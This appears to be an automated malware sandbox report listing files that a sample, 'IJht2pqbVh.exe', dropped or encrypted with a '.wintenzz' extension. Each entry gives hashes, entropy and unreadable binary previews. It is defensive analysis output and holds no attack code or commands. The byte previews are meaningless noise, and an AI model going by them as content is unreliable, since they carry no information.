Preview:	................TBWuNnZnd0mLHarChwHgBjMu..........q..T_l.8...\|.M..2......I.Uc1....{.O~.P..\.r.t...c...)jR.m......_.Z.M}....J"...[`...K.....9.A.Q..~2.xI..f..]Qj.6e...{.$.o.......<O.a.IC.q.....\_.{....RiE....h.'....<{..z...H...n...+..Fo^...B2`.OlW+.B.J.F.pK.D.<.dm 7#%i.~.....fR-.UU..m.F...'HG.r0..,.[!....o7...>H5.3..?....../..6..93.-.7..y........FjV.&>#2.P.g....8.+n~\......Y.@."..._f.d.h.'u....k...}tk&.kq...x..".b.^.`..M.m....l&A..C.p;.pA...V6(..$.=......"<H.}`6....j>..F...'..4;.l.<....I)..[..>ap...J_,6.a....^i.b..^....(.8...PHG..{.......z..l.......[zD.......;.^:eJ...#..w.+.B.{..3.._.%.[...[B.~.@.Y..^....RW3i.M...\|....8H.}....~.... .....l.........>..~.\|.6.C......bp_H....\|.....e.....6MC.N..G.VG'...f.....zy..u....Yv..JhEw.3gM.......qiW.7T.s...t..~.k.Z%3....H~.Y .(......................m k..........$...%?.....I..j.#...W...Dl..L.!...v..j......\...S.L+.......i..Q..sw...1...B.z.....j(..*.M$.....R.3Hj\|o.s.R-j...n..F..P.6'F#2.n..44...D........]

C:\Users\user\Documents\BXAJUJAOEO\PWZOQIFCAN.png.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.778196134280676
Encrypted:	false
SSDEEP:	24:xL0rjKwbnwP1848NND65gteJGunODAXSr9CvBMCPUlOFtMa//:xClwcb2RADAXqkSCPUlOFt//
MD5:	13C45C73AE255A57D4B864F56CDD96C0
SHA1:	B44AA3F560E9C12C9816731FA113D75F79030B1A
SHA-256:	59B843930B8594A97F01F5EEEED4106763C5225957B82548FD07522BE5116114
SHA-512:	52FC76DFD9CA9EDBA5A34F921F2D1E5E791412A0587757911DAD15BC7D9F42DDFEC7FF0E82448A95060B0258B5B2A49FCD9F5D627E56B2A9039522F8F5A19DBE
Malicious:	false
Preview:	................TBWuNnZnd0mLHarChwHgBjMu..........q..T_l.8...\|.M..2......I.Uc1....{.O~.P..\.r.t...c...)jR.m......_.Z.M}....J"...[`...K.....9.A.Q..~2.xI..f..]Qj.6e...{.$.o.......<O.a.IC.q.....\_.{....RiE....h.'....<{..z...H...n...+..Fo^...B2`.OlW+.B.J.F.pK.D.<.dm 7#%i.~.....fR-.UU..m.F...'HG.r0..,.[!....o7...>H5.3..?....../..6..93.-.7..y........FjV.&>#2.P.g....8.+n~\......Y.@."..._f.d.h.'u....k...}tk&.kq...x..".b.^.`..M.m....l&A..C.p;.pA...V6(..$.=......"<H.}`6....j>..F...'..4;.l.<....I)..[..>ap...J_,6.a....^i.b..^....(.8...PHG..{.......z..l.......[zD.......;.^:eJ...#..w.+.B.{..3.._.%.[...[B.~.@.Y..^....RW3i.M...\|....8H.}....~.... .....l.........>..~.\|.6.C......bp_H....\|.....e.....6MC.N..G.VG'...f.....zy..u....Yv..JhEw.3gM.......qiW.7T.s...t..~.k.Z%3....H~.Y .(......................m k..........$...%?.....I..j.#...W...Dl..L.!...v..j......\...S.L+.......i..Q..sw...1...B.z.....j(..*.M$.....R.3Hj\|o.s.R-j...n..F..P.6'F#2.n..44...D........]

C:\Users\user\Documents\DQOFHVHTMG.docx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.750643958906183
Encrypted:	false
SSDEEP:	24:Gqj1C4IasXsFSpGLn3xOccb1ZehF8/xUuJmv/YICl:Ljg4IamsKc3xO/qF8Fmv/o
MD5:	FA5ED5DAB2C8B2CFA8D44FFD29F17E94
SHA1:	F6C154D43B973596E128718C814A669660D56CAD
SHA-256:	D8F995D1B45130120E2D2EBABA56348785AF54B6824E0A62CD835A193AF5BB6F
SHA-512:	EA4AD8A64FCD7668E576629E9EC5DEE555FCA6A0B1E7C64E858D621A9AB71A22082495998DBEBCFE2BB46F03FE87C765BCABD8F7E420B97DC46D5A41FC154BCE
Malicious:	false
Preview:	................s0y6fmVAhPzv7YEGVTiYmMXq...........E.Aog.#Vq.7..ej..1..;d.^.m.i9./..F..K....L.3. ....c[.l.....o...c]:..<.!:.(....r.......&t........p..k.?j...<,.t..)V..C......D.G...w.....0.9.........z.5.....\|.8....1.D_..Uz....]...NT.>j.)d..M:..h._)..E...2.)....y.-..>.n..h../@!....@{......r.....N8&o}.\|..........._jP....VE....c_.0l...;..2.p.W.....G97..wY......k.x...(.5.1...{lM....x...8).....0a...e.R.(a.?..r.V..-yJ.F6r.....?....c..Z:.Wp.#A."..>.V'>.....O.....+..d".k....x.C..@.4fJ..........2+.J.........2.<=..=...b..)n;..Whe..xk...8.....r.I...f7l...c...R.......ow...O.....W.s..q4H....E......^..NL......(G.;_br.TO..!..E>..nj.....'E...0.'_..vT(p]X...5...!Fw.0...b..T.n..]8......^.....r..q.?...H.^y.U...>tJ4.).{6.lq=....-....s.6.}..V^g ...04.<..?..H.......>....&..0..+..........vR+1.#...Q..43.B.#.n.......qK....EO...q.B.....^....O.>...W..S.n..uR8T8..:..J.2.P..-....jL3..........y>...TH...............=$=..r.2.I.....dmhp..A.d...3...W......5.

C:\Users\user\Documents\DQOFHVHTMG.docx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.750643958906183
Encrypted:	false
SSDEEP:	24:Gqj1C4IasXsFSpGLn3xOccb1ZehF8/xUuJmv/YICl:Ljg4IamsKc3xO/qF8Fmv/o
MD5:	FA5ED5DAB2C8B2CFA8D44FFD29F17E94
SHA1:	F6C154D43B973596E128718C814A669660D56CAD
SHA-256:	D8F995D1B45130120E2D2EBABA56348785AF54B6824E0A62CD835A193AF5BB6F
SHA-512:	EA4AD8A64FCD7668E576629E9EC5DEE555FCA6A0B1E7C64E858D621A9AB71A22082495998DBEBCFE2BB46F03FE87C765BCABD8F7E420B97DC46D5A41FC154BCE
Malicious:	false
Preview:	................s0y6fmVAhPzv7YEGVTiYmMXq...........E.Aog.#Vq.7..ej..1..;d.^.m.i9./..F..K....L.3. ....c[.l.....o...c]:..<.!:.(....r.......&t........p..k.?j...<,.t..)V..C......D.G...w.....0.9.........z.5.....\|.8....1.D_..Uz....]...NT.>j.)d..M:..h._)..E...2.)....y.-..>.n..h../@!....@{......r.....N8&o}.\|..........._jP....VE....c_.0l...;..2.p.W.....G97..wY......k.x...(.5.1...{lM....x...8).....0a...e.R.(a.?..r.V..-yJ.F6r.....?....c..Z:.Wp.#A."..>.V'>.....O.....+..d".k....x.C..@.4fJ..........2+.J.........2.<=..=...b..)n;..Whe..xk...8.....r.I...f7l...c...R.......ow...O.....W.s..q4H....E......^..NL......(G.;_br.TO..!..E>..nj.....'E...0.'_..vT(p]X...5...!Fw.0...b..T.n..]8......^.....r..q.?...H.^y.U...>tJ4.).{6.lq=....-....s.6.}..V^g ...04.<..?..H.......>....&..0..+..........vR+1.#...Q..43.B.#.n.......qK....EO...q.B.....^....O.>...W..S.n..uR8T8..:..J.2.P..-....jL3..........y>...TH...............=$=..r.2.I.....dmhp..A.d...3...W......5.

C:\Users\user\Documents\DQOFHVHTMG.pdf Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.801258301038337
Encrypted:	false
SSDEEP:	24:yQQx7Og19ZvpBeIdt8NcJ03BezZWFhOQqt7qkRNlcVjnD:eh1bremyxeOMPRD+D
MD5:	DE13ADC4D59605A6A0105F5A055BFE0D
SHA1:	1CD8BF3D2C1513495EE7B8A52CA004CA09C978D3
SHA-256:	79CD0F7B22524CE7FBE66EC7BF731F6E47E55648C293057210C89752659552B0
SHA-512:	6577F50BD44B309777BCABBDF2E14E6B731C1FD977E10F035DCE0EC83904F2444B1888A41D4077A1C5C32EF6FA1F14024D5E266A02FD69C4C5A9074C9BBF04CD
Malicious:	false
Preview:	................HQLjas4lTlX7LWioAeEbxthZ.........b...D.B...$..B..l.&.l0...A....H.....Ad\|..l..2.p.U+.A..q...t....0,...`....I0...{.m..........L.e....<...........9..W.k.9P........)\..$f....Q.k.w..rr\]..sT.\|2..6..q.I..D\|>.43E..U?..6..j.u..SH.C}.d..%..Q%a..i..'. 7.(..9..%.m./..K..&&9Lk.'.\P$..t..VrOG.+...fC.Ee.....u....i..=.3xI{J.b.....z.)....,.9.._4....rI.!.v#aK.c...A.~...8........e...(e.r......x.t.&.{M&.k..~^.r^3.`B..>R..9vk.9..D\...'e.\y..&....Xy.\.R....Cc.j.`^X.FC.....ZC...K...-2....K....;;] ..~_..ZA+...Ea...^./.Q.....Y...Q....yI.\|...wB.&..d,.L.3Y.1....x..x...9.P....s_.....[> WV.99l-.......c...T.5.&&..7.yT.q,..9^@.I...w....:..;Y.R.F.X.{F_j.S.....(...Z...Hf_..o.x.,.V..\|..;U%.f..'V...qA.5s.<....5.OiV.U.e.<y.I..NVO.L.....#0u8.@.....C.....4.xY... .Kpu5..N..e...........q.....P....!..E'.B...'..].#....lP&.....C...3... xm...Y..*..#...PT...^.<....z...>Z.F0>o...~.......$.0K...q........4.].xAM.@.r..l..F..M.1......u<+...RW.p..W..o..9).P.Tg^...F..

C:\Users\user\Documents\DQOFHVHTMG.pdf.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.801258301038337
Encrypted:	false
SSDEEP:	24:yQQx7Og19ZvpBeIdt8NcJ03BezZWFhOQqt7qkRNlcVjnD:eh1bremyxeOMPRD+D
MD5:	DE13ADC4D59605A6A0105F5A055BFE0D
SHA1:	1CD8BF3D2C1513495EE7B8A52CA004CA09C978D3
SHA-256:	79CD0F7B22524CE7FBE66EC7BF731F6E47E55648C293057210C89752659552B0
SHA-512:	6577F50BD44B309777BCABBDF2E14E6B731C1FD977E10F035DCE0EC83904F2444B1888A41D4077A1C5C32EF6FA1F14024D5E266A02FD69C4C5A9074C9BBF04CD
Malicious:	false
Preview:	................HQLjas4lTlX7LWioAeEbxthZ.........b...D.B...$..B..l.&.l0...A....H.....Ad\|..l..2.p.U+.A..q...t....0,...`....I0...{.m..........L.e....<...........9..W.k.9P........)\..$f....Q.k.w..rr\]..sT.\|2..6..q.I..D\|>.43E..U?..6..j.u..SH.C}.d..%..Q%a..i..'. 7.(..9..%.m./..K..&&9Lk.'.\P$..t..VrOG.+...fC.Ee.....u....i..=.3xI{J.b.....z.)....,.9.._4....rI.!.v#aK.c...A.~...8........e...(e.r......x.t.&.{M&.k..~^.r^3.`B..>R..9vk.9..D\...'e.\y..&....Xy.\.R....Cc.j.`^X.FC.....ZC...K...-2....K....;;] ..~_..ZA+...Ea...^./.Q.....Y...Q....yI.\|...wB.&..d,.L.3Y.1....x..x...9.P....s_.....[> WV.99l-.......c...T.5.&&..7.yT.q,..9^@.I...w....:..;Y.R.F.X.{F_j.S.....(...Z...Hf_..o.x.,.V..\|..;U%.f..'V...qA.5s.<....5.OiV.U.e.<y.I..NVO.L.....#0u8.@.....C.....4.xY... .Kpu5..N..e...........q.....P....!..E'.B...'..].#....lP&.....C...3... xm...Y..*..#...PT...^.<....z...>Z.F0>o...~.......$.0K...q........4.].xAM.@.r..l..F..M.1......u<+...RW.p..W..o..9).P.Tg^...F..

C:\Users\user\Documents\DQOFHVHTMG\BWDRWEEARI.jpg Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.7877862318813555
Encrypted:	false
SSDEEP:	24:ecJNnKP9zsohCCF37FSFDtDzw2U0hQJYmcxnAhuJVtcrhutFeeiI:ecDnCzssP37FktDzw2UBgxnZZ00FXh
MD5:	D71994529C479D8EF2CEC3D9FDDEB889
SHA1:	C1437CE905F40BD3529B802247478B86C5411B2D
SHA-256:	DBB83C41E229599BE7EE40B988D4DD9666CB957592651B4CB5FD337274C7FD47
SHA-512:	E7E7E162BB711E6045725935680D090FED8201CDED435F5E8280F88F2AB7D7152FE9A1214659B8C52F6AC3A5C703D935E792E137A56AF92673A0EBEF9A2A7100
Malicious:	false
Preview:	................OSUuo5d5bDOk60ZnLt95ytBp.............C.0..n.^.j?.t.Y.l....+O?#..A.jH.Z.... )..ko...-..+.?[....F..461..f.;&dg7..Zs.......a....D@f...\|.A.;cH".sWDfWb7.n.I.a.[5...d(.-U-.C.1.SZU..J....u....W..k.v.......E{mi01..4J..[xO............{).?rN.ZZ.@`-.........A.....):Jx..l.)Q...].H.#N.A....&....._...4N$..Y\ Cha.8..X..".v.5q....C`.j.....xT......i...-..G..z...T4U..3.}.....(....x.UI.?....]....y.....m.....pN.{F...v..U5........G..)q.TFx..P..3.?....,8fM.../..L.u...L.}.!S....$o...FJd..(2l....a.f.6a9..m....3..R2_n.t........B..gq....B....>q.....E.z...?@..R4`...F...1.a...{:'...4...4O...8m...N...=8....._x-.?r....J.O:...u.%R7.O..2.K@x../...Y..Xc.Xx.....^.?...]....D...Ol=..k......1x..u..A&&K0.l{7.T.t.A..Ru....V.<........W....9.~.0.=.=,..D..s....r:..6v&...2S.......Q~.L9....TN2iA..z......Z.l.k.>...Yd.q.{..Bt..#..3j.......HL..T..^..8\|.._.T.C..z.......W.Sf...*8.m..VFC7. ..o...`...5.....`.t...R..dD.w..;...:8.E...+..V._..y...5sx..94.2%....K?....P.b..b.

C:\Users\user\Documents\DQOFHVHTMG\BWDRWEEARI.jpg.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.7877862318813555
Encrypted:	false
SSDEEP:	24:ecJNnKP9zsohCCF37FSFDtDzw2U0hQJYmcxnAhuJVtcrhutFeeiI:ecDnCzssP37FktDzw2UBgxnZZ00FXh
MD5:	D71994529C479D8EF2CEC3D9FDDEB889
SHA1:	C1437CE905F40BD3529B802247478B86C5411B2D
SHA-256:	DBB83C41E229599BE7EE40B988D4DD9666CB957592651B4CB5FD337274C7FD47
SHA-512:	E7E7E162BB711E6045725935680D090FED8201CDED435F5E8280F88F2AB7D7152FE9A1214659B8C52F6AC3A5C703D935E792E137A56AF92673A0EBEF9A2A7100
Malicious:	false
Preview:	................OSUuo5d5bDOk60ZnLt95ytBp.............C.0..n.^.j?.t.Y.l....+O?#..A.jH.Z.... )..ko...-..+.?[....F..461..f.;&dg7..Zs.......a....D@f...\|.A.;cH".sWDfWb7.n.I.a.[5...d(.-U-.C.1.SZU..J....u....W..k.v.......E{mi01..4J..[xO............{).?rN.ZZ.@`-.........A.....):Jx..l.)Q...].H.#N.A....&....._...4N$..Y\ Cha.8..X..".v.5q....C`.j.....xT......i...-..G..z...T4U..3.}.....(....x.UI.?....]....y.....m.....pN.{F...v..U5........G..)q.TFx..P..3.?....,8fM.../..L.u...L.}.!S....$o...FJd..(2l....a.f.6a9..m....3..R2_n.t........B..gq....B....>q.....E.z...?@..R4`...F...1.a...{:'...4...4O...8m...N...=8....._x-.?r....J.O:...u.%R7.O..2.K@x../...Y..Xc.Xx.....^.?...]....D...Ol=..k......1x..u..A&&K0.l{7.T.t.A..Ru....V.<........W....9.~.0.=.=,..D..s....r:..6v&...2S.......Q~.L9....TN2iA..z......Z.l.k.>...Yd.q.{..Bt..#..3j.......HL..T..^..8\|.._.T.C..z.......W.Sf...*8.m..VFC7. ..o...`...5.....`.t...R..dD.w..;...:8.E...+..V._..y...5sx..94.2%....K?....P.b..b.

C:\Users\user\Documents\DQOFHVHTMG\DQOFHVHTMG.docx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.810178210871746
Encrypted:	false
SSDEEP:	24:iFAXC7+7OOzsk6VJ6z4hGnFxUzqoSoN0xqlI9g6jl8c7H:iFAX3ECziG3YZag6
MD5:	A789F49BEC1D66952A6227E0B7AA475C
SHA1:	8A835F95FE85574D7EC7166553FF097BDC701DD6
SHA-256:	DCA6CDE83BF48F80A75B56A9FF3110DEE97D1B70BE525189156AA8AB55EA2886
SHA-512:	AAA75E83B2DDB5D12B9522C67B4469AA0F4009977C9B9204B45A5F1C7115DCA05B2E5375B56BAA92836D7FF297694E079E4E308D5B9670816ED6902DC28B9040
Malicious:	false
Preview:	................U2Nhw9784x9yTqsp2OubcY3s.............e....5.(...Egns.J.....&^...}{r.9T.?u=......%.M..D...&Z.....r.......Q.W~Fd.Y..G.s.,..e...v...H...O..g'.[.7...M"0i...ugi..\:S.......}...,......X9......k....\..O.y......wf.E[3.{.w...$.Iw...B...B.a."?.:....ic...U(.l..x.....~wD.]...C^o1..r..../....f}....\l2...2..}.\...>.7{Sm...i...p..k.....k>....(W.W.FwI.Jj...E....D.Z.U.@';"..E....9.......c..b..B.).$h.w...2%85&f..r..>.!U?.O.1@'..;p..z;A.o...b.......NR.i>z....3....'...N..g.IG\|..>i.../.G^.#....z.C..{...Gu...Ud......D.Hr...z...{........-%.0......eud.....H...O.?.:.6Ya'2.......Y.gd.i...c..q3..,.....q[a......Be..B``}3..V.BY...%...}..+.x...Q....s_"k....E.._.XI>10.T.N:.NU_...i.!....!..y.\|...r6....X.....B...3..........m.U....[1..%..j]R.." .dgw.tGZ.6b..Z5.w/yR.....K.?.&2.V..K.R.n.jr9..n....#EF..P.hkg.W......p..........1..r.........S.......F.F...nF.(.=M.........%.w...H:..[.......&=",8...f.9.c..c...(.Q.VV/.."..[t.k....k......7.F..f..m.,/...^D2.

C:\Users\user\Documents\DQOFHVHTMG\DQOFHVHTMG.docx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.810178210871746
Encrypted:	false
SSDEEP:	24:iFAXC7+7OOzsk6VJ6z4hGnFxUzqoSoN0xqlI9g6jl8c7H:iFAX3ECziG3YZag6
MD5:	A789F49BEC1D66952A6227E0B7AA475C
SHA1:	8A835F95FE85574D7EC7166553FF097BDC701DD6
SHA-256:	DCA6CDE83BF48F80A75B56A9FF3110DEE97D1B70BE525189156AA8AB55EA2886
SHA-512:	AAA75E83B2DDB5D12B9522C67B4469AA0F4009977C9B9204B45A5F1C7115DCA05B2E5375B56BAA92836D7FF297694E079E4E308D5B9670816ED6902DC28B9040
Malicious:	false
Preview:	................U2Nhw9784x9yTqsp2OubcY3s.............e....5.(...Egns.J.....&^...}{r.9T.?u=......%.M..D...&Z.....r.......Q.W~Fd.Y..G.s.,..e...v...H...O..g'.[.7...M"0i...ugi..\:S.......}...,......X9......k....\..O.y......wf.E[3.{.w...$.Iw...B...B.a."?.:....ic...U(.l..x.....~wD.]...C^o1..r..../....f}....\l2...2..}.\...>.7{Sm...i...p..k.....k>....(W.W.FwI.Jj...E....D.Z.U.@';"..E....9.......c..b..B.).$h.w...2%85&f..r..>.!U?.O.1@'..;p..z;A.o...b.......NR.i>z....3....'...N..g.IG\|..>i.../.G^.#....z.C..{...Gu...Ud......D.Hr...z...{........-%.0......eud.....H...O.?.:.6Ya'2.......Y.gd.i...c..q3..,.....q[a......Be..B``}3..V.BY...%...}..+.x...Q....s_"k....E.._.XI>10.T.N:.NU_...i.!....!..y.\|...r6....X.....B...3..........m.U....[1..%..j]R.." .dgw.tGZ.6b..Z5.w/yR.....K.?.&2.V..K.R.n.jr9..n....#EF..P.hkg.W......p..........1..r.........S.......F.F...nF.(.=M.........%.w...H:..[.......&=",8...f.9.c..c...(.Q.VV/.."..[t.k....k......7.F..f..m.,/...^D2.

C:\Users\user\Documents\DQOFHVHTMG\IZMFBFKMEB.pdf Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.822264405073772
Encrypted:	false
SSDEEP:	24:BEnJkz5xLAEpwhBzc1ZyJbrGkCOG6MfcvtN4GpLec1jYwYq6kW:R95AEpw01ZyJb40MkvgGVr1jYnV
MD5:	FBAF94BEFDA72E5B525BAAC8F4071BC5
SHA1:	15A121293B4F609CD98D27B1D23CA13CDF8D73D3
SHA-256:	6E53A3D674D7354B5C7C43FB0E998B7FA64462EBDF3E5B12B31C9CA1343BD555
SHA-512:	220685C22F4DDE7EE61EBE57B2A214A656A4B8AA895D04870737DCC741718F2B7645EFD6FD45EE6E74293A829761FE7F95DE7BD2222F0B6B5B6B9EE92B3818B7
Malicious:	false
Preview:	................AwYi2qbc8vzJMH02aG7YhruJ........QL..M..M.._.IT...x...5Lh....~ .B.u.7.ST.....O.C...}'....wW?,.q..+.e'......Rv.f<.%.....at..}=.\.B$.^.....v...zV...u.....M..PT..l(.K..I..n.c.....`..!...Q....N...:OE....q....].%.....k:..CG.x.t.._MG.i./S.K..>.w.m.ZPL8.g....!..}x._..f.....\|]..!.......P@..q....-.<V.R....v&y.P.t......X..z@.I./...&...4....Dg..&.J..h...o...O.6S.f.%.&..d[...h."R.Q.......~..*.@)h..K./.X.8..v...]/.....j..}..t...!..P..3.bo...3....Hz...;..4.......j.-w..aC...........6...z....(..^.....;\6N.%I.!l.\...%......Q.1$..r..vx......~.Nh........+.b..gvy.d;.o..@3.?t.c..`.J,.W.0.l.3...,e..R9j5r..A..h...1.m....$^.wR..Z.....'.^..`:...2k.s...._.....h.. .6....4rM./.B.....,..m.p@V.t.I..D.u.k.....=. tL.V.54=6.A..?_...\|d...E.1l.6.~T.O........s.[.....9.\|q(J..;...(^8..DAV.F...E{....7c...K..(..8oE.tCEP.S..0[.`....<..,~,Y.2..^..S.M..G...h.\|...d8Z....bt....b.B....2./.n.....ZJ.W)...0....../....W...Jj....7.....fL..`.....Y.#..6..M.~.<...07.5..D..._.(.}.m.

C:\Users\user\Documents\DQOFHVHTMG\IZMFBFKMEB.pdf.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.822264405073772
Encrypted:	false
SSDEEP:	24:BEnJkz5xLAEpwhBzc1ZyJbrGkCOG6MfcvtN4GpLec1jYwYq6kW:R95AEpw01ZyJb40MkvgGVr1jYnV
MD5:	FBAF94BEFDA72E5B525BAAC8F4071BC5
SHA1:	15A121293B4F609CD98D27B1D23CA13CDF8D73D3
SHA-256:	6E53A3D674D7354B5C7C43FB0E998B7FA64462EBDF3E5B12B31C9CA1343BD555
SHA-512:	220685C22F4DDE7EE61EBE57B2A214A656A4B8AA895D04870737DCC741718F2B7645EFD6FD45EE6E74293A829761FE7F95DE7BD2222F0B6B5B6B9EE92B3818B7
Malicious:	false
Preview:	................AwYi2qbc8vzJMH02aG7YhruJ........QL..M..M.._.IT...x...5Lh....~ .B.u.7.ST.....O.C...}'....wW?,.q..+.e'......Rv.f<.%.....at..}=.\.B$.^.....v...zV...u.....M..PT..l(.K..I..n.c.....`..!...Q....N...:OE....q....].%.....k:..CG.x.t.._MG.i./S.K..>.w.m.ZPL8.g....!..}x._..f.....\|]..!.......P@..q....-.<V.R....v&y.P.t......X..z@.I./...&...4....Dg..&.J..h...o...O.6S.f.%.&..d[...h."R.Q.......~..*.@)h..K./.X.8..v...]/.....j..}..t...!..P..3.bo...3....Hz...;..4.......j.-w..aC...........6...z....(..^.....;\6N.%I.!l.\...%......Q.1$..r..vx......~.Nh........+.b..gvy.d;.o..@3.?t.c..`.J,.W.0.l.3...,e..R9j5r..A..h...1.m....$^.wR..Z.....'.^..`:...2k.s...._.....h.. .6....4rM./.B.....,..m.p@V.t.I..D.u.k.....=. tL.V.54=6.A..?_...\|d...E.1l.6.~T.O........s.[.....9.\|q(J..;...(^8..DAV.F...E{....7c...K..(..8oE.tCEP.S..0[.`....<..,~,Y.2..^..S.M..G...h.\|...d8Z....bt....b.B....2./.n.....ZJ.W)...0....../....W...Jj....7.....fL..`.....Y.#..6..M.~.<...07.5..D..._.(.}.m.

C:\Users\user\Documents\DQOFHVHTMG\PWZOQIFCAN.xlsx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.804436411258766
Encrypted:	false
SSDEEP:	24:h0fX9lQg+auhGvDPFeiqQj187VG+XvydAq84QqpyEIJhb+uR6Vw6h2Ej:hsLWhGvD1n4GwvydCewhb+uk72Ej
MD5:	2A078F48B123407D6EC85EA4E188EDA2
SHA1:	4EC289E30D0457F5B548779CF970F5B05853CFEF
SHA-256:	51B97CF345D1883A8A51E10DAAAAA15C61403B3DC8C8347B101883D058E99DAC
SHA-512:	430DAA9C0844474F68A33A5E34996905ABFA2335241C12C6C897CFDA1757E45409F9A42D24191D26A75BB22CA262421443FF2A2C089D89C0E11F8F9402891B26
Malicious:	false
Preview:	................dq54OlJwmvowp6iplHh7Dfzy........R)....a]/..D..J....]..s}8...L..u.......T..-.......xy....46.Z...3.&.....b..hI...E..L8...3...-.....+..f7D..g.z....s.8.$".....~C}(..6T....J....D.._...].M;.0:.(..e.1....p.&.....%Q.%.....e..:..L'..g..M........LUn?....'.Qa. ...IJ.!..P..P.!.f.L.o..K.w.U...O{......p..Q........L.w...+.....EF.s.n.6......b.......`".S.}...=..._..w"..VH......l;RhU..S..YVB..2...X........x...\...@..sh..J....4......Y..7..d....r'>..q..{2p.wsX&...%...!.V\|XB.j..cO.e..VG....Fm..R..u,W...M.".vl...u...........y...N_.R....(....Q.^..u..{+F..f`...b_....N..Z.5.M,Q...T..S..W.ehv....s.....2D.hP.. .........E.%:.....tt.d.F.5A.q...9N8......n..CqZ9.....-.t.P....iQ.x..me.#t.jH.....u...g.u%.y0'......._...I..8..;Y....5.;..p..m.....&.(Z...K.)fH.....36.m~[.[.]....Q..aU..I.H.0.X.1....[d'.ip....v]p.......C" .~....&..&..{.(../..{H.....M..L....=.:..Y ...u.m.$.A....(.Oz...Dl(.U.\...6...U).4... C..[.....g*.....L_03`..^.J..<..>_.n.f.I8P..^...&...5~.8..

C:\Users\user\Documents\DQOFHVHTMG\PWZOQIFCAN.xlsx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.804436411258766
Encrypted:	false
SSDEEP:	24:h0fX9lQg+auhGvDPFeiqQj187VG+XvydAq84QqpyEIJhb+uR6Vw6h2Ej:hsLWhGvD1n4GwvydCewhb+uk72Ej
MD5:	2A078F48B123407D6EC85EA4E188EDA2
SHA1:	4EC289E30D0457F5B548779CF970F5B05853CFEF
SHA-256:	51B97CF345D1883A8A51E10DAAAAA15C61403B3DC8C8347B101883D058E99DAC
SHA-512:	430DAA9C0844474F68A33A5E34996905ABFA2335241C12C6C897CFDA1757E45409F9A42D24191D26A75BB22CA262421443FF2A2C089D89C0E11F8F9402891B26
Malicious:	false
Preview:	................dq54OlJwmvowp6iplHh7Dfzy........R)....a]/..D..J....]..s}8...L..u.......T..-.......xy....46.Z...3.&.....b..hI...E..L8...3...-.....+..f7D..g.z....s.8.$".....~C}(..6T....J....D.._...].M;.0:.(..e.1....p.&.....%Q.%.....e..:..L'..g..M........LUn?....'.Qa. ...IJ.!..P..P.!.f.L.o..K.w.U...O{......p..Q........L.w...+.....EF.s.n.6......b.......`".S.}...=..._..w"..VH......l;RhU..S..YVB..2...X........x...\...@..sh..J....4......Y..7..d....r'>..q..{2p.wsX&...%...!.V\|XB.j..cO.e..VG....Fm..R..u,W...M.".vl...u...........y...N_.R....(....Q.^..u..{+F..f`...b_....N..Z.5.M,Q...T..S..W.ehv....s.....2D.hP.. .........E.%:.....tt.d.F.5A.q...9N8......n..CqZ9.....-.t.P....iQ.x..me.#t.jH.....u...g.u%.y0'......._...I..8..;Y....5.;..p..m.....&.(Z...K.)fH.....36.m~[.[.]....Q..aU..I.H.0.X.1....[d'.ip....v]p.......C" .~....&..&..{.(../..{H.....M..L....=.:..Y ...u.m.$.A....(.Oz...Dl(.U.\...6...U).4... C..[.....g*.....L_03`..^.J..<..>_.n.f.I8P..^...&...5~.8..

C:\Users\user\Documents\DQOFHVHTMG\UBVUNTSCZJ.png Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.814859508212213
Encrypted:	false
SSDEEP:	24:gEM/buw07YAc/S5FvYfe4RZUtC5tHhM6/OErHVpL9Nom6qcTg+h:gEMKw07YAc/S5ZYf7HoCfHh7/OE51bcz
MD5:	BFE64CA815F5BFD5DDE2BE6B1C2CEF5E
SHA1:	C664CCA6A7D0579D92DA193D4960B2C80A182F48
SHA-256:	616448D9853401344AF1E760263BBD746841E71893FD245F103FBD11CBEBC64A
SHA-512:	6167748C9F70524EC9B745E86B685B9B02247ECC8C743A68C2041E83AA96E3F11DBED3D33F42AEFF50BCF3AA65572EC043C1E415905E745F27288E86C1237702
Malicious:	false
